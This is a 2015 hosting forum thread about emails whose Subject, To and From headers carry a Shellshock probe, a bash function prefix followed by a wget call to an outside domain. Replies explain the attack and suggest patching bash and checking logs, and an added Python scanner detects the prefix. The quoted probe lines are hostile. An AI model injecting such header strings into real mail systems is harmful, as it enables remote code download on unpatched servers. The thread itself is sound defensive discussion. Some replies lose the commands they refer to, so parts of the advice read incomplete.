

Wget issue possibly security risk.




Posted by ClarLabs, 07-03-2015, 02:37 AM
Hello WHT. I received an email yesterday that has no body text, just a subject. The subject is as follows: (){:;};wget -o/tmp/._http://mlanissan.co.in/HELLOWORLD/ I do not own that domain, and when visiting the full URL I get a 404; their actual site is about cars, so I have no idea how this command was run or why. I was wondering what the risks with the above are, if any, and what I should do to mitigate it if it is a security risk. I am looking forward to all your wonderful replies. Thanks for your help. Yours sincerely, Chris Russell

Posted by wheelerc, 07-03-2015, 04:46 AM
I got a number of emails into one of my servers at around 11pm GMT last night:

    Received: from bearing.headissue.net ([178.248.246.217]:60440 helo=website.com)
        by with smtp (Exim 4.85) (envelope-from ) id 1ZAmWS-000585-12
        for nobody@; Thu, 02 Jul 2015 22:59:56 +0100
    To: () { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD
    From: () { :; };wget -o/tmp/._ http://mlanissan.co.in/HELLOWORLD

Searching for "http://mlanissan.co.in/HELLOWORLD" got me to this page. It looks like a failed attempt to exploit a mail handler?

Posted by Server Management, 07-03-2015, 05:30 AM
Are you able to take a quick look through your logs to see if you have any funky business going on with "User-Agent"?

Posted by wheelerc, 07-03-2015, 05:35 AM
Through which logs? This was inbound email, which doesn't (as far as I'm aware) use a User-Agent. I can check the web access logs, but there is a lot of traffic to the server so is there anything specific you'd like me to search for?

Posted by Server Management, 07-03-2015, 05:47 AM
There's not really a whole lot of information here, but seeing "(){:;};" could raise a concern for the Shellshock palaver from last year, which is still doing the rounds and which could be done over SMTP. A quick check for anything funky with the user-agent could be beneficial.

Posted by AcheronMedia-VK, 07-03-2015, 06:20 AM
That's a BASH exploit attempt (Shellshock), it seems, not wget. User-agent is just one vector; it's not strictly needed for the exploit. It was used because the UA is the only way to inject a random string into the logs, and if there's a CGI via shell involved, it would trigger execution. In this case, if it's coming through mail, it's probing for a system that passes mail headers as env vars to a shell script, e.g. procmail or similar deployments.
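A small header scanner, added here as an example and not code from any of the posters, that flags mail headers carrying the bash function-definition prefix quoted in this thread (both the "(){:;};" and "() { :; };" spellings) and returns the command that trails it. The sample message is constructed; the probe domain in it is a placeholder.

```python
import email
import re

# Bash function definition followed by trailing commands, the shape a
# Shellshock probe takes when it hopes a header value lands in an env var.
# Tolerates the whitespace differences between "(){:;};" and "() { :; };".
SHELLSHOCK_RE = re.compile(
    r'^\s*\(\s*\)\s*\{[^}]*\}\s*;\s*(?P<trailer>.*)$', re.DOTALL
)

# Constructed sample modelled on the headers posted in the thread.
SAMPLE_MESSAGE = """\
Received: from mail.example.net ([192.0.2.10]) by mx.example.org with smtp
Subject: (){:;};wget -o/tmp/._ http://probe.example/HELLOWORLD/
To: () { :; };wget -o/tmp/._ http://probe.example/HELLOWORLD
From: () { :; };wget -o/tmp/._ http://probe.example/HELLOWORLD
X-Mailer: Example mailer 1.0

"""


def is_shellshock_payload(value):
    """Return the trailing command if value starts with a bash function
    definition followed by ';', otherwise None."""
    match = SHELLSHOCK_RE.match(value)
    if not match:
        return None
    # Folded headers may contain newlines; collapse them for reporting.
    return " ".join(match.group("trailer").split())


def find_shellshock_headers(raw_message):
    """Parse a raw RFC 822 message and return [(header_name, trailing_command)]
    for every header whose value looks like a Shellshock probe."""
    msg = email.message_from_string(raw_message)  # compat32: raw string values
    hits = []
    for name, value in msg.items():
        trailer = is_shellshock_payload(str(value))
        if trailer is not None:
            hits.append((name, trailer))
    return hits


if __name__ == "__main__":
    for header, command in find_shellshock_headers(SAMPLE_MESSAGE):
        print(f"{header}: shellshock-style prefix, trailing command: {command}")
```

Pointing the scanner at the raw headers of a suspect message (or the matching lines of a mail log) tells you which fields carried the prefix; whether it ran depends on whether anything on the box exports those headers to a bash child, which is the check the earlier replies describe.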

Posted by ClarLabs, 07-03-2015, 04:42 PM
Thank you all for your replies. How can I check whether this has caused any issues, e.g. what log files would I need to view, etc.? I will look forward to your replies.

Posted by NickLim, 07-03-2015, 07:31 PM
Interesting... So they are planting the malicious command through their user agents into the logs? So if one were to parse the logs with an unsecured/vulnerable parser, it may execute the malicious command? If so, that is a very smart malware, and one that should make web operators be more careful.

Posted by tuhostmx, 07-03-2015, 07:32 PM
Change the nobody forward to an empty value from your WHM as root. I had the same issue, but it was solved by doing this. In some cases this is caused by remote spammers. Try to block the spammer IP.

Posted by WHR-Abner, 07-04-2015, 03:00 AM
Yes, definitely sounds like the old Shellshock Bash vulnerability. What is the version of bash on your server? Find that out via Then run to see if there are any updates available. If it is up to date, you don't have to worry much.

Posted by sabrina84, 07-04-2015, 03:01 PM
ClarCloud, kindly update your server with the latest patches and reboot. But please, can you paste the output of "lsb_release -a" or "cat /etc/redhat-release" before and after patching?


